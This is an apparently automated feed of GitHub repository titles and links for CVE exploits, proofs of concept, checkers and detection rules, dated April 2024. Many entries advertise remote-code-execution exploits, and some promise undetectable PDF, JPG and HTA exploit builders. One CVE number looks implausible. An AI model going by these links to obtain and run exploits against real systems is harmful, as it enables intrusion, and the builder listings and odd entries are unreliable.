**Oracle VirtualBox Elevation of Privilege (Local Privilege Escalation) Vulnerability** : [mansk1es/CVE-2024-21111](https://github.com/mansk1es/CVE-2024-21111) create time: 2024-04-22T07:05:04Z

**GSoC 2022 Project testing CVEs against CRS** : [coreruleset/project-seaweed](https://github.com/coreruleset/project-seaweed) create time: 2022-08-29T17:39:27Z

**This is a demo on the Apache Strut CVE-2017–5638 Vulnerability** : [xeroxis-xs/Computer-Security-Apache-Struts-Vulnerability](https://github.com/xeroxis-xs/Computer-Security-Apache-Struts-Vulnerability) create time: 2024-04-21T17:55:50Z

**no description** : [bde574786/Sequelize-1day-CVE-2023-25813](https://github.com/bde574786/Sequelize-1day-CVE-2023-25813) create time: 2024-04-21T17:39:05Z

**A exploit for the CVE-2019-11395 vulnerability in the MailCarrier 2.51 email application, enabling remote code execution.** : [caioprince/CVE-2019-11395](https://github.com/caioprince/CVE-2019-11395) create time: 2024-04-21T13:39:40Z

**Python POC for CVE-2023-6019 taken from https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe** : [Clydeston/CVE-2023-6019](https://github.com/Clydeston/CVE-2023-6019) create time: 2024-04-21T14:30:28Z

**JetBrains TeamCity Unauthenticated Remote Code Execution - Python3 Implementation** : [hotplugin0x01/CVE-2023-42793](https://github.com/hotplugin0x01/CVE-2023-42793) create time: 2024-04-21T13:52:28Z

**PoC for CVE-2024-24576 vulnerability "BatBadBut"** : [SheL3G/CVE-2024-24576-PoC-BatBadBut](https://github.com/SheL3G/CVE-2024-24576-PoC-BatBadBut) create time: 2024-04-21T13:42:28Z

**Python exploit and checker script for CVE-2024-3400 Palo Alto Command Injection and Arbitrary File Creation** : [Kr0ff/cve-2024-3400](https://github.com/Kr0ff/cve-2024-3400) create time: 2024-04-21T12:38:13Z

**An issue was discovered in cPanel before 11.109.9999.116. Cross-Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.** : [Cappricio-Securities/CVE-2023-29489](https://github.com/Cappricio-Securities/CVE-2023-29489) create time: 2024-04-21T12:26:22Z

**Persistent XSS on Comtrend AR-5387un router** : [OscarAkaElvis/CVE-2018-8062](https://github.com/OscarAkaElvis/CVE-2018-8062) create time: 2024-04-20T23:26:15Z

**Improper Access Control on D-Link DIR-605L router** : [OscarAkaElvis/CVE-2023-51119](https://github.com/OscarAkaElvis/CVE-2023-51119) create time: 2024-04-20T23:37:10Z

**no description** : [Gaurav1020/CVE-2024-24576-PoC-Rust](https://github.com/Gaurav1020/CVE-2024-24576-PoC-Rust) create time: 2024-04-20T18:54:00Z

**no description** : [Gaurav1020/CVE-2024-24576-PoC-Rust](https://github.com/Gaurav1020/CVE-2024-24576-PoC-Rust) create time: 2024-04-20T17:02:04Z

**H3C ER8300G2-X config download** : [FuBoLuSec/CVE-2024-32238](https://github.com/FuBoLuSec/CVE-2024-32238) create time: 2024-04-20T16:23:10Z

**no description** : [faiqu3/cve-2018-6574](https://github.com/faiqu3/cve-2018-6574) create time: 2024-04-20T15:02:22Z

**a python proof of concept for cve-2024-24576** : [p14t1num/cve-2024-24576-python](https://github.com/p14t1num/cve-2024-24576-python) create time: 2024-04-20T13:07:54Z

**Exploit for CVE-2024-3400** : [stronglier/CVE-2024-3400](https://github.com/stronglier/CVE-2024-3400) create time: 2024-04-20T06:57:30Z

**WORDPRESS-CVE-2024-25600-EXPLOIT-RCE - WordPress Bricks Builder Remote Code Execution (RCE)** : [X-Projetion/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE](https://github.com/X-Projetion/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE) create time: 2024-04-20T06:36:22Z

**Check xz vulnerability (cve_2024_3094) on your system.** : [buluma/ansible-role-cve_2024_3094](https://github.com/buluma/ansible-role-cve_2024_3094) create time: 2024-04-20T06:15:57Z

**no description** : [Lucky-lm/CVE-2024-32205](https://github.com/Lucky-lm/CVE-2024-32205) create time: 2024-04-20T04:11:19Z

**no description** : [asdfjkl11/CVE-2024-32238](https://github.com/asdfjkl11/CVE-2024-32238) create time: 2024-04-20T03:55:21Z

**no description** : [Whiteh4tWolf/CVE-2024-1651-PoC](https://github.com/Whiteh4tWolf/CVE-2024-1651-PoC) create time: 2024-04-19T16:18:59Z

**Extract useful information from PANOS support file for CVE-2024-3400** : [HackingLZ/panrapidcheck](https://github.com/HackingLZ/panrapidcheck) create time: 2024-04-19T14:56:17Z

**no description** : [huseyinstif/CVE-2024-21338-main](https://github.com/huseyinstif/CVE-2024-21338-main) create time: 2024-04-19T08:17:11Z

**Finding Palo Alto devices vulnerable to CVE-2024-3400.** : [pwnj0hn/CVE-2024-3400](https://github.com/pwnj0hn/CVE-2024-3400) create time: 2024-04-19T06:37:32Z

**no description** : [ASG-CASTLE/CVE-2021-4034](https://github.com/ASG-CASTLE/CVE-2021-4034) create time: 2024-04-19T04:33:14Z

**no description** : [ASG-CASTLE/CVE-2023-27350](https://github.com/ASG-CASTLE/CVE-2023-27350) create time: 2024-04-19T04:47:10Z

**CVE-2024-3400 POC written in Rust and Python** : [Ravaan21/CVE-2024-3400](https://github.com/Ravaan21/CVE-2024-3400) create time: 2024-04-18T21:14:15Z

**no description** : [sxyrxyy/CVE-2024-3400-Check](https://github.com/sxyrxyy/CVE-2024-3400-Check) create time: 2024-04-18T21:12:49Z

**Script that exploits the vulnerability that allows establishing a backdoor in the UnrealIRCd service with CVE-2010-2075** : [JoseLRC97/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution](https://github.com/JoseLRC97/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution) create time: 2024-04-18T18:55:27Z

**Script that exploits the vulnerability that allows remote code execution in Ruby 2.3.8 ​​with CVE-2016-2098** : [JoseLRC97/Ruby-on-Rails-ActionPack-Inline-ERB-Remote-Code-Execution](https://github.com/JoseLRC97/Ruby-on-Rails-ActionPack-Inline-ERB-Remote-Code-Execution) create time: 2024-04-18T18:45:28Z

**Script that exploits the vulnerability of the ProFTPd 1.3.5 service with CVE-2015-3306** : [JoseLRC97/ProFTPd-1.3.5-mod_copy-Remote-Command-Execution](https://github.com/JoseLRC97/ProFTPd-1.3.5-mod_copy-Remote-Command-Execution) create time: 2024-04-18T18:05:06Z

**Python3 RCE PoC for CVE-2021-26084** : [Marshall-Hallenbeck/CVE-2021-26084_Confluence_RCE](https://github.com/Marshall-Hallenbeck/CVE-2021-26084_Confluence_RCE) create time: 2024-04-18T16:28:15Z

**no description** : [liyansong2018/CVE-2024-32258](https://github.com/liyansong2018/CVE-2024-32258) create time: 2024-04-18T17:07:07Z

**Python script to check Palo Alto firewalls for CVE-2024-3400 exploit attempts** : [swaybs/CVE-2024-3400](https://github.com/swaybs/CVE-2024-3400) create time: 2024-04-18T16:45:51Z

**Simple Python code to check for arbitrary uploading** : [codeblueprint/CVE-2024-3400](https://github.com/codeblueprint/CVE-2024-3400) create time: 2024-04-18T16:35:29Z

**no description** : [julioliraup/Identificador-CVE-2018-11759](https://github.com/julioliraup/Identificador-CVE-2018-11759) create time: 2024-04-18T14:28:11Z

**EDL for IPs attacking customers with CVE-2024-3400** : [hahasagined/CVE-2024-3400](https://github.com/hahasagined/CVE-2024-3400) create time: 2024-04-18T15:06:03Z

**This is a proof of concept for CVE-2024-20356, a Command Injection vulnerability in Cisco's CIMC.** : [nettitude/CVE-2024-20356](https://github.com/nettitude/CVE-2024-20356) create time: 2024-04-12T15:07:42Z

**XZ Utils CVE-2024-3094 POC for Kubernetes** : [neuralinhibitor/xzwhy](https://github.com/neuralinhibitor/xzwhy) create time: 2024-04-18T13:08:05Z

**no description** : [schooldropout1337/CVE-2024-3400](https://github.com/schooldropout1337/CVE-2024-3400) create time: 2024-04-18T10:16:22Z

**no description** : [0x23242526/nDay1_POC_CVE-2020-8899](https://github.com/0x23242526/nDay1_POC_CVE-2020-8899) create time: 2024-04-17T11:17:14Z

**cve-2024-0305可用的exp** : [jidle123/cve-2024-0305exp](https://github.com/jidle123/cve-2024-0305exp) create time: 2024-04-18T03:13:43Z

**no description** : [aeyesec/CVE-2024-27316_poc](https://github.com/aeyesec/CVE-2024-27316_poc) create time: 2024-04-17T20:08:05Z

**CVE-2024-3400 : Palo Alto OS Command Injection - POC** : [retkoussa/CVE-2024-3400](https://github.com/retkoussa/CVE-2024-3400) create time: 2024-04-17T22:28:10Z

**Simple POC for CVE-2024-3400** : [phantomradar/cve-2024-3400-poc](https://github.com/phantomradar/cve-2024-3400-poc) create time: 2024-04-17T21:03:39Z

**Global Protec Palo Alto File Write Exploit** : [ak1t4/CVE-2024-3400](https://github.com/ak1t4/CVE-2024-3400) create time: 2024-04-17T16:01:20Z

**This tool is designed to exploit the CVE-2024-25600 vulnerability found in the Bricks Builder plugin for WordPress. The vulnerability allows for unauthenticated remote code execution on affected websites. The tool automates the exploitation process by retrieving nonces and sending specially crafted requests to execute arbitrary commands.** : [0bl1v10nf0rg0773n/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress](https://github.com/0bl1v10nf0rg0773n/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress) create time: 2024-04-17T15:21:01Z

**A go-exploit for Apache Druid CVE-2023-25194** : [vulncheck-oss/cve-2023-25194](https://github.com/vulncheck-oss/cve-2023-25194) create time: 2024-04-17T13:36:34Z

**A go-exploit for Apache ActiveMQ CVE-2023-46604** : [vulncheck-oss/cve-2023-46604](https://github.com/vulncheck-oss/cve-2023-46604) create time: 2024-04-17T13:10:34Z

**no description** : [BassamAssiri/CVE-2024-3217-POC](https://github.com/BassamAssiri/CVE-2024-3217-POC) create time: 2024-04-17T13:43:57Z

**Have we not learnt from HoneyPoC?** : [ZephrFish/CVE-2024-3400-Canary](https://github.com/ZephrFish/CVE-2024-3400-Canary) create time: 2024-04-17T11:41:01Z

**no description** : [Chocapikk/CVE-2024-3400](https://github.com/Chocapikk/CVE-2024-3400) create time: 2024-04-16T21:21:41Z

**no description** : [edutko/cve-2024-31497](https://github.com/edutko/cve-2024-31497) create time: 2024-04-17T10:43:42Z

**Fork of https://github.com/hakaioffsec/CVE-2024-21338** : [UMU618/CVE-2024-21338](https://github.com/UMU618/CVE-2024-21338) create time: 2024-04-17T10:16:21Z

**CVE-2024-3400-RCE** : [admi-n/CVE-2024-3400-RCE-copy](https://github.com/admi-n/CVE-2024-3400-RCE-copy) create time: 2024-04-17T08:27:52Z

**Oracle VM VirtualBox for Windows prior to 7.0.16 - Elevation of Privileges** : [Alaatk/CVE-2024-21107](https://github.com/Alaatk/CVE-2024-21107) create time: 2024-04-17T06:13:20Z

**command injection** : [ox1111/-CVE-2024-1874-](https://github.com/ox1111/-CVE-2024-1874-) create time: 2024-04-17T05:26:34Z

**A check program for CVE-2024-3400, Palo Alto PAN-OS unauthenticated command injection vulnerability.** : [index2014/CVE-2024-3400-Checker](https://github.com/index2014/CVE-2024-3400-Checker) create time: 2024-04-17T04:58:42Z

**A script designed to uncover vulnerabilities in Putty by exploiting CVE-2024-31497.** : [sh1k4ku/CVE-2024-31497](https://github.com/sh1k4ku/CVE-2024-31497) create time: 2024-04-17T04:00:20Z

**no description** : [ebickle/CVE-2021-23337-template](https://github.com/ebickle/CVE-2021-23337-template) create time: 2024-04-17T03:09:52Z

**no description** : [AkashicYiTai/CVE-2019-12937-ToaruOS-](https://github.com/AkashicYiTai/CVE-2019-12937-ToaruOS-) create time: 2024-04-17T02:14:45Z

**Full exploit of Cve-2024-21762!** : [Codeb3af/Cve-2024-21762-](https://github.com/Codeb3af/Cve-2024-21762-) create time: 2024-04-16T22:06:52Z

**CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect** : [ihebski/CVE-2024-3400](https://github.com/ihebski/CVE-2024-3400) create time: 2024-04-16T21:24:15Z

**no description** : [Chocapikk/CVE-2024-3400](https://github.com/Chocapikk/CVE-2024-3400) create time: 2024-04-16T21:00:32Z

**Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.** : [hakaioffsec/CVE-2024-21338](https://github.com/hakaioffsec/CVE-2024-21338) create time: 2024-04-13T05:53:02Z

**Exploiting Reflected Cross-Site Scripting (XSS) in WordPress archive-tainacan-collection Theme** : [RansomGroupCVE/CVE-2024-3867-POC](https://github.com/RansomGroupCVE/CVE-2024-3867-POC) create time: 2024-04-16T17:52:19Z

**no description** : [CONDITIONBLACK/CVE-2024-3400-POC](https://github.com/CONDITIONBLACK/CVE-2024-3400-POC) create time: 2024-04-16T17:08:15Z

**no description** : [AsfandAliMemon25/CVE-2023-50164Analysis-](https://github.com/AsfandAliMemon25/CVE-2023-50164Analysis-) create time: 2024-04-16T16:20:04Z

**CVE-2024-3400** : [W01fh4cker/CVE-2024-3400](https://github.com/W01fh4cker/CVE-2024-3400) create time: 2024-04-16T16:18:56Z

**CVE-2024-3400 Palo Alto OS Command Injection** : [h4x0r-dz/CVE-2024-3400](https://github.com/h4x0r-dz/CVE-2024-3400) create time: 2024-04-16T14:18:08Z

**no description** : [ii4gsp/CVE-2020-27786](https://github.com/ii4gsp/CVE-2020-27786) create time: 2024-04-16T13:45:35Z

**no description** : [LeopoldSkell/CVE-2024-3273](https://github.com/LeopoldSkell/CVE-2024-3273) create time: 2024-04-16T09:12:58Z

**no description** : [huseyinstif/CVE-2024-21338](https://github.com/huseyinstif/CVE-2024-21338) create time: 2024-04-16T09:12:23Z

**CVE-2024-31497 PuTTY Biased ECDSA Nonce Generation Exploit** : [JohnNetSouldRU/CVE-2024-31497-POC](https://github.com/JohnNetSouldRU/CVE-2024-31497-POC) create time: 2024-04-16T07:42:01Z

**no description** : [LoanVitor/CVE-2024-3400-](https://github.com/LoanVitor/CVE-2024-3400-) create time: 2024-04-16T07:31:22Z

**no description** : [almkuznetsov/CVE-2024-1441](https://github.com/almkuznetsov/CVE-2024-1441) create time: 2024-04-16T07:14:33Z

**no description** : [LoanVitor/CVE-2024-3400-](https://github.com/LoanVitor/CVE-2024-3400-) create time: 2024-04-16T07:02:33Z

**Issabel PBX 4.0.0 Remote Code Execution (Authenticated) - CVE-2024-0986** : [gunzf0x/Issabel-PBX-4.0.0-RCE-Authenticated](https://github.com/gunzf0x/Issabel-PBX-4.0.0-RCE-Authenticated) create time: 2024-04-16T03:24:25Z

**CVE-2023-51385** : [thinkliving2020/CVE-2023-51385-](https://github.com/thinkliving2020/CVE-2023-51385-) create time: 2024-04-16T03:01:03Z

**CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect** : [AdaniKamal/CVE-2024-3400](https://github.com/AdaniKamal/CVE-2024-3400) create time: 2024-04-16T01:43:24Z

**Joomla! < 4.2.8 - Unauthenticated information disclosure** : [mariovata/CVE-2023-23752-Python](https://github.com/mariovata/CVE-2023-23752-Python) create time: 2024-04-15T18:18:02Z

**CVE-2024-1642470 is a critical vulnerability discovered in the Windows USB Generic Parent Driver. The vulnerability arises due to improper input validation within the driver's IOCTL handling mechanism. As a result, remote attackers can execute arbitrary code via crafted IOCTL requests, potentially leading to system compromise.** : [Symbolexe/CVE-2024-1642470](https://github.com/Symbolexe/CVE-2024-1642470) create time: 2024-04-15T17:51:59Z

**OpenPLC 3 WebServer Authenticated Remote Code Execution.** : [mind2hex/CVE-2021-31630](https://github.com/mind2hex/CVE-2021-31630) create time: 2024-04-15T16:55:30Z

**CVE-2024-3400 POC Remote Code Execution (RCE) Palo Alto Networks PAN-OS software** : [kerberoshacker2/CVE-2024-3400-POC](https://github.com/kerberoshacker2/CVE-2024-3400-POC) create time: 2024-04-15T16:19:44Z

**CVE-2024-31734** : [HBLocker/CVE-2024-31734](https://github.com/HBLocker/CVE-2024-31734) create time: 2024-04-15T07:19:10Z

**This is a bad-binder exploit affecting the android binder IPC system.** : [mutur4/CVE-2019-2215](https://github.com/mutur4/CVE-2019-2215) create time: 2024-04-15T06:40:04Z

**no description** : [AlexDoe11/CVE-2023-48788-Proof-of-concept-SQLinj](https://github.com/AlexDoe11/CVE-2023-48788-Proof-of-concept-SQLinj) create time: 2024-04-15T06:52:50Z

**no description** : [AlexDoe11/CVE-2024-3136-Wordpress-RCE](https://github.com/AlexDoe11/CVE-2024-3136-Wordpress-RCE) create time: 2024-04-15T06:52:54Z

**no description** : [AlexDoe11/CVE-2024-3094-EXPLOIT](https://github.com/AlexDoe11/CVE-2024-3094-EXPLOIT) create time: 2024-04-15T06:52:52Z

**no description** : [AlexDoe11/CVE-2024-29988-MS-Exchange-RCE](https://github.com/AlexDoe11/CVE-2024-29988-MS-Exchange-RCE) create time: 2024-04-15T06:52:51Z

**no description** : [AlexDoe11/CVE-2024-25693-exploit](https://github.com/AlexDoe11/CVE-2024-25693-exploit) create time: 2024-04-15T06:52:48Z

**no description** : [AlexDoe11/CVE-2024-26198-Exchange-RCE](https://github.com/AlexDoe11/CVE-2024-26198-Exchange-RCE) create time: 2024-04-15T06:52:47Z

**no description** : [VoltaireYoung/CVE-2024-31719----AMI-Aptio-5-Vulnerability](https://github.com/VoltaireYoung/CVE-2024-31719----AMI-Aptio-5-Vulnerability) create time: 2023-07-30T00:07:14Z

**no description** : [dcheng69/CVE-2022-0185-Case-Study](https://github.com/dcheng69/CVE-2022-0185-Case-Study) create time: 2024-04-15T02:42:43Z

**A simple bash script to check for evidence of compromise related to CVE-2024-3400** : [MurrayR0123/CVE-2024-3400_compromise_checker](https://github.com/MurrayR0123/CVE-2024-3400_compromise_checker) create time: 2024-04-15T03:28:22Z

**A simple POC that demonstrates A vulnerability found in IObitUnlocker 1.1.2 that leverages IOCTL codes found it its vulnerable driver (IObitUnlocker.sys), providing ability to unlock, delete, rename, copy, and move running files and a low privileged user.** : [Aterror2be/CVE-2020-14974](https://github.com/Aterror2be/CVE-2020-14974) create time: 2024-04-14T19:53:03Z

**Vulnerabilidad de palo alto** : [MrR0b0t19/CVE-2024-3400](https://github.com/MrR0b0t19/CVE-2024-3400) create time: 2024-04-14T19:11:16Z

**CVE-2024-3400 POC Remote Code Execution (RCE) Palo Alto Networks PAN-OS software** : [kerberoshacker/CVE-2024-3400-POC](https://github.com/kerberoshacker/CVE-2024-3400-POC) create time: 2024-04-14T18:27:04Z

**no description** : [momika233/CVE-2024-3400](https://github.com/momika233/CVE-2024-3400) create time: 2024-04-14T15:16:16Z

**Potential Integer Overflow Leading To Heap Overflow in AMD KFD.** : [MaherAzzouzi/CVE-2024-26817-amdkfd](https://github.com/MaherAzzouzi/CVE-2024-26817-amdkfd) create time: 2024-04-14T12:25:50Z

**CVE-2024-27983 this repository builds up a vulnerable HTTP2 Node.js server (`server-nossl.js`) based on CVE-2024-27983 which exploits a continuation flood vulnerability in HTTP2 servers.** : [lirantal/CVE-2024-27983-nodejs-http2](https://github.com/lirantal/CVE-2024-27983-nodejs-http2) create time: 2024-04-14T11:34:52Z

**# CVE-2023-29489 exploit** : [some-man1/CVE-2023-29489](https://github.com/some-man1/CVE-2023-29489) create time: 2024-04-14T08:29:22Z

**A reproduction of CVE-2019-18634, sudo privilege escalation with buffer overflow.** : [chanbakjsd/CVE-2019-18634](https://github.com/chanbakjsd/CVE-2019-18634) create time: 2024-04-14T07:36:54Z

**no description** : [miguelc49/CVE-2020-36732-1](https://github.com/miguelc49/CVE-2020-36732-1) create time: 2024-04-14T07:39:36Z

**no description** : [miguelc49/CVE-2020-36732-2](https://github.com/miguelc49/CVE-2020-36732-2) create time: 2024-04-14T07:39:33Z

**no description** : [miguelc49/CVE-2020-10596-1](https://github.com/miguelc49/CVE-2020-10596-1) create time: 2024-04-14T07:39:15Z

**no description** : [miguelc49/CVE-2020-10596-2](https://github.com/miguelc49/CVE-2020-10596-2) create time: 2024-04-14T07:39:12Z

**no description** : [miguelc49/CVE-2021-29002-1](https://github.com/miguelc49/CVE-2021-29002-1) create time: 2024-04-14T07:39:45Z

**no description** : [miguelc49/CVE-2021-35958-1](https://github.com/miguelc49/CVE-2021-35958-1) create time: 2024-04-14T07:38:47Z

**no description** : [miguelc49/CVE-2021-35958-2](https://github.com/miguelc49/CVE-2021-35958-2) create time: 2024-04-14T07:38:44Z

**no description** : [miguelc49/CVE-2021-46063-3](https://github.com/miguelc49/CVE-2021-46063-3) create time: 2024-04-14T07:38:42Z

**no description** : [miguelc49/CVE-2021-46063-1](https://github.com/miguelc49/CVE-2021-46063-1) create time: 2024-04-14T07:38:36Z

**no description** : [miguelc49/CVE-2021-46063-2](https://github.com/miguelc49/CVE-2021-46063-2) create time: 2024-04-14T07:38:33Z

**no description** : [miguelc49/CVE-2022-47197-1](https://github.com/miguelc49/CVE-2022-47197-1) create time: 2024-04-14T07:39:42Z

**no description** : [miguelc49/CVE-2022-47197-2](https://github.com/miguelc49/CVE-2022-47197-2) create time: 2024-04-14T07:39:39Z

**no description** : [miguelc49/CVE-2022-22885-1](https://github.com/miguelc49/CVE-2022-22885-1) create time: 2024-04-14T07:38:59Z

**no description** : [miguelc49/CVE-2022-22885-2](https://github.com/miguelc49/CVE-2022-22885-2) create time: 2024-04-14T07:38:50Z

**no description** : [miguelc49/CVE-2023-34458-3](https://github.com/miguelc49/CVE-2023-34458-3) create time: 2024-04-14T07:39:30Z

**no description** : [miguelc49/CVE-2023-34458-1](https://github.com/miguelc49/CVE-2023-34458-1) create time: 2024-04-14T07:39:26Z

**no description** : [miguelc49/CVE-2023-34458-2](https://github.com/miguelc49/CVE-2023-34458-2) create time: 2024-04-14T07:39:23Z

**no description** : [miguelc49/CVE-2023-36281-1](https://github.com/miguelc49/CVE-2023-36281-1) create time: 2024-04-14T07:39:20Z

**no description** : [miguelc49/CVE-2023-36281-2](https://github.com/miguelc49/CVE-2023-36281-2) create time: 2024-04-14T07:39:18Z

**no description** : [miguelc49/CVE-2023-4145-3](https://github.com/miguelc49/CVE-2023-4145-3) create time: 2024-04-14T07:39:09Z

**no description** : [miguelc49/CVE-2023-4145-1](https://github.com/miguelc49/CVE-2023-4145-1) create time: 2024-04-14T07:39:04Z

**no description** : [miguelc49/CVE-2023-4145-2](https://github.com/miguelc49/CVE-2023-4145-2) create time: 2024-04-14T07:39:01Z

**no description** : [miguelc49/CVE-2023-33264-3](https://github.com/miguelc49/CVE-2023-33264-3) create time: 2024-04-14T07:35:17Z

**no description** : [miguelc49/CVE-2023-33264-1](https://github.com/miguelc49/CVE-2023-33264-1) create time: 2024-04-14T07:35:15Z

**no description** : [miguelc49/CVE-2023-33264-2](https://github.com/miguelc49/CVE-2023-33264-2) create time: 2024-04-14T07:35:13Z

**no description** : [miguelc49/CVE-2023-6019-3](https://github.com/miguelc49/CVE-2023-6019-3) create time: 2024-04-14T07:35:11Z

**no description** : [miguelc49/CVE-2023-45280-2](https://github.com/miguelc49/CVE-2023-45280-2) create time: 2024-04-14T07:22:00Z

**CVE-2024-24576 PoC in Julia** : [lpn/CVE-2024-24576.jl](https://github.com/lpn/CVE-2024-24576.jl) create time: 2024-04-14T05:00:18Z

**cve-2020-1938 Tomcat-Ajp-lfi.git脚本** : [Warelock/cve-2020-1938](https://github.com/Warelock/cve-2020-1938) create time: 2024-04-14T04:10:41Z

**no description** : [fuzzlove/CVE-2022-35411](https://github.com/fuzzlove/CVE-2022-35411) create time: 2024-04-14T04:08:44Z

**Python script for CMS Made Simple 2.1.6 - Remote Code Execution.** : [b1d0ws/exploit-cve-2018-7448](https://github.com/b1d0ws/exploit-cve-2018-7448) create time: 2024-04-14T02:56:47Z

**https://nvd.nist.gov/vuln/detail/CVE-2024-24576** : [mishalhossin/CVE-2024-24576-PoC-Python](https://github.com/mishalhossin/CVE-2024-24576-PoC-Python) create time: 2024-04-14T02:10:55Z

**no description** : [Brownpanda29/cve202424576](https://github.com/Brownpanda29/cve202424576) create time: 2024-04-14T00:35:41Z

**Microsoft Windows HTA (HTML Application) - Pinnacle of Remote Code Execution** : [GetCaption/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/GetCaption/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-04-13T21:01:15Z

**A meticulous scrutiny of the Exploit PDFs innards exposes a network of malevolence, unveiling both the nefarious hyperlink and the URL that precipitates** : [GetCaption/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/GetCaption/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-04-13T21:01:15Z

**In the hushed galleries of the Silent JPG Exploit, a symphony shrouded in enigma unfurls—an opus named silent-jpg-exploit-2018—a title that reverberates through the annals of intrigue.** : [GetCaption/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/GetCaption/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-04-13T21:01:14Z

**URL Contamination Exploit Muted Java Drive-By downloads can transpire during the act of perusing a website, inaugurating an electronic mail communication.** : [GetCaption/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/GetCaption/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-04-13T21:01:14Z

**no description** : [miguelc49/CVE-2022-39987-3](https://github.com/miguelc49/CVE-2022-39987-3) create time: 2024-04-13T18:46:27Z

**no description** : [miguelc49/CVE-2022-39987-1](https://github.com/miguelc49/CVE-2022-39987-1) create time: 2024-04-13T18:46:22Z

**no description** : [miguelc49/CVE-2022-39987-2](https://github.com/miguelc49/CVE-2022-39987-2) create time: 2024-04-13T18:46:17Z

**no description** : [miguelc49/CVE-2023-6019-1](https://github.com/miguelc49/CVE-2023-6019-1) create time: 2024-04-13T18:46:49Z

**no description** : [miguelc49/CVE-2023-6019-2](https://github.com/miguelc49/CVE-2023-6019-2) create time: 2024-04-13T18:46:44Z

**no description** : [miguelc49/CVE-2023-41592-3](https://github.com/miguelc49/CVE-2023-41592-3) create time: 2024-04-13T18:46:40Z

**no description** : [miguelc49/CVE-2023-41592-1](https://github.com/miguelc49/CVE-2023-41592-1) create time: 2024-04-13T18:46:36Z

**no description** : [miguelc49/CVE-2023-41592-2](https://github.com/miguelc49/CVE-2023-41592-2) create time: 2024-04-13T18:46:32Z

**no description** : [miguelc49/CVE-2023-38499-3](https://github.com/miguelc49/CVE-2023-38499-3) create time: 2024-04-13T18:46:13Z

**no description** : [miguelc49/CVE-2023-38499-1](https://github.com/miguelc49/CVE-2023-38499-1) create time: 2024-04-13T18:46:07Z

**no description** : [miguelc49/CVE-2023-38499-2](https://github.com/miguelc49/CVE-2023-38499-2) create time: 2024-04-13T18:46:02Z

**no description** : [miguelc49/CVE-2023-43667-3](https://github.com/miguelc49/CVE-2023-43667-3) create time: 2024-04-13T18:45:57Z

**no description** : [miguelc49/CVE-2023-43667-1](https://github.com/miguelc49/CVE-2023-43667-1) create time: 2024-04-13T18:45:51Z

**no description** : [miguelc49/CVE-2023-43667-2](https://github.com/miguelc49/CVE-2023-43667-2) create time: 2024-04-13T18:45:45Z

**no description** : [miguelc49/CVE-2023-5720-3](https://github.com/miguelc49/CVE-2023-5720-3) create time: 2024-04-13T18:45:39Z

**no description** : [miguelc49/CVE-2023-5720-1](https://github.com/miguelc49/CVE-2023-5720-1) create time: 2024-04-13T18:45:35Z

**no description** : [miguelc49/CVE-2023-5720-2](https://github.com/miguelc49/CVE-2023-5720-2) create time: 2024-04-13T18:45:31Z

**no description** : [miguelc49/CVE-2023-45280-3](https://github.com/miguelc49/CVE-2023-45280-3) create time: 2024-04-13T18:45:27Z

**no description** : [miguelc49/CVE-2023-45280-1](https://github.com/miguelc49/CVE-2023-45280-1) create time: 2024-04-13T18:45:21Z

**no description** : [FoxyProxys/CVE-2024-3400](https://github.com/FoxyProxys/CVE-2024-3400) create time: 2024-04-13T18:14:47Z

**La siguiente regla YARA ayuda a detectar la presencia del backdoor en la librería liblzma comprometida en sistemas que utilizan las versiones 5.6.0 y 5.6.1 de la herramienta de compresión XZ.** : [fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-](https://github.com/fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-) create time: 2024-04-13T16:37:32Z

**MAL-004: Command Injection Bypass for CVE-2020-12641 in Roundcube Webmail** : [mbadanoiu/MAL-004](https://github.com/mbadanoiu/MAL-004) create time: 2024-04-13T15:59:47Z

**CVE-2020-13965: Cross-Site Scripting via Malicious XML Attachment in Roundcube Webmail** : [mbadanoiu/CVE-2020-13965](https://github.com/mbadanoiu/CVE-2020-13965) create time: 2024-04-13T15:49:04Z

**CVE-2020-12640: Local PHP File Inclusion via "Plugin Value" in Roundcube Webmail** : [mbadanoiu/CVE-2020-12640](https://github.com/mbadanoiu/CVE-2020-12640) create time: 2024-04-13T15:37:14Z

**CVE-2020-12625: Cross-Site Scripting via Malicious HTML Attachment in Roundcube Webmail** : [mbadanoiu/CVE-2020-12625](https://github.com/mbadanoiu/CVE-2020-12625) create time: 2024-04-13T15:22:23Z

**MinIO vulnerability exploit - CVE-2023-28432** : [0xRulez/CVE-2023-28432](https://github.com/0xRulez/CVE-2023-28432) create time: 2024-04-13T13:52:43Z

**no description** : [0x0d3ad/CVE-2024-3400](https://github.com/0x0d3ad/CVE-2024-3400) create time: 2024-04-13T14:00:31Z

**no description** : [CerTusHack/CVE-2024-3400-PoC](https://github.com/CerTusHack/CVE-2024-3400-PoC) create time: 2024-04-13T11:55:53Z

**CVE-2024-3400 Checker** : [shamo0/CVE-2024-3400](https://github.com/shamo0/CVE-2024-3400) create time: 2024-04-13T11:06:09Z

**Demonstration of CVE-2020-11023** : [andreassundstrom/cve-2020-11023-demonstration](https://github.com/andreassundstrom/cve-2020-11023-demonstration) create time: 2024-04-13T09:57:53Z

